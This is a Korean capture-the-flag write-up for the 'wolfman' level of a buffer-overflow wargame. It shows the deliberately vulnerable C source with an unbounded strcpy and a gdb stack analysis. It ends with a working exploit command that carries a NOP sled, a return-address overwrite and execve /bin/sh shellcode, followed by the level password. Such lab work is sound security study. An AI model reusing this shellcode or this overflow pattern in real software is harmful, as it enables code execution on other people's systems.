orc / cantata로 접속
wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Wargame target for this level: argv[1] is copied into a fixed 40-byte
 * stack array with no length check. The overflow is the exercise itself and
 * is left as-is here; the comments only explain what each step does.
 *
 * Note: <string.h> is not included, so memset/strcpy/strlen are called
 * without prototypes (implicit declarations, accepted only by pre-C99
 * compilers), and `main` has no return type (implicit int, C89 style).
 */
main(int argc, char *argv[])
{
char buffer[40];   /* destination of the unbounded strcpy below */
int i;
if(argc < 2){
printf("argv error\n");
exit(0);           /* exits with status 0 even on this error path */
}
// egghunter: every environment string is overwritten in place with zeros
// (up to its strlen), so the environment is not usable as a place to park
// input for the rest of the program.
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
// Reads byte 47 of argv[1] without first checking that argv[1] is at least
// 48 bytes long; a shorter argument makes this a read past the string's
// terminator. The comparison constrains exactly one byte, not the length.
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// Unbounded copy of argv[1] into the 40-byte array: this is the stack
// buffer overflow the level is built around. In real code the copy would be
// bounded (e.g. snprintf(buffer, sizeof buffer, "%s", argv[1])) or the input
// rejected when strlen(argv[1]) >= sizeof buffer.
strcpy(buffer, argv[1]);
printf("%s\n", buffer);   /* format string is a literal; only the data is untrusted */
// buffer hunter: zero the 40-byte array before returning so the copied data
// does not stay in it. Anything strcpy wrote beyond buffer[39] is not cleared.
memset(buffer, 0, 40);
}
이번에도 egg hunter로 인해 환경변수를 사용할 수 없고 저번과 같은 조건이 있다. 같은 방법으로 풀어보도록 하겠다.
wolfman을 카피한 wolfman2를 gdb로 실행시킨다.
[orc@localhost orc]$ bash2
[orc@localhost orc]$ cp wolfman wolfman2
[orc@localhost orc]$ gdb -q wolfman2
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
...
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add %esp,8
0x80485c5 <main+197>: lea %eax,[%ebp-40]
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push 0x8048669
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add %esp,8
0x80485d6 <main+214>: push 40
0x80485d8 <main+216>: push 0
0x80485da <main+218>: lea %eax,[%ebp-40]
0x80485dd <main+221>: push %eax
0x80485de <main+222>: call 0x8048430 <memset>
0x80485e3 <main+227>: add %esp,12
0x80485e6 <main+230>: leave
0x80485e7 <main+231>: ret
...
strcpy 호출이 끝난 직후인 main+194 지점에 브레이크포인트를 걸고, 조건에 맞는 인자로 실행시킨 뒤 스택을 출력했다.
(gdb) b *main+194
Breakpoint 1 at 0x80485c2
(gdb) r `python -c 'print "A"*47 + "\xbf"'`
Starting program: /home/orc/wolfman2 `python -c 'print "A"*47 + "\xbf"'`
Breakpoint 1, 0x80485c2 in main ()
(gdb) x/64x $esp
0xbffffad4: 0xbffffae0 0xbffffc5d 0x00000015 0x41414141
0xbffffae4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffaf4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb04: 0x41414141 0x41414141 0xbf414141 0x00000000
0xbffffb14: 0xbffffb54 0xbffffb60 0x40013868 0x00000002
0xbffffb24: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffb34: 0x00000002 0xbffffb54 0x08048390 0x0804861c
0xbffffb44: 0x4000ae60 0xbffffb4c 0x40013e90 0x00000002
0xbffffb54: 0xbffffc4a 0xbffffc5d 0x00000000 0xbffffc8e
0xbffffb64: 0xbffffcb0 0xbffffcba 0xbffffcc8 0xbffffce7
0xbffffb74: 0xbffffcf3 0xbffffd0c 0xbffffd25 0xbffffd44
0xbffffb84: 0xbffffd4f 0xbffffd5d 0xbffffd9c 0xbffffdab
0xbffffb94: 0xbffffdc0 0xbffffdd0 0xbffffdd9 0xbffffdf4
0xbffffba4: 0xbffffdff 0xbffffe10 0xbffffe1e 0xbffffe26
0xbffffbb4: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffbc4: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffb54를 골라 RET 자리에 덮어씌웠다.
./wolfman `python -c 'print "\x90"*44+"\x54\xfb\xff\xbf"+"\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
dummy(44) + RET 주소(4) + NOP(10000) + shellcode
공격에 성공했다!
love eyuna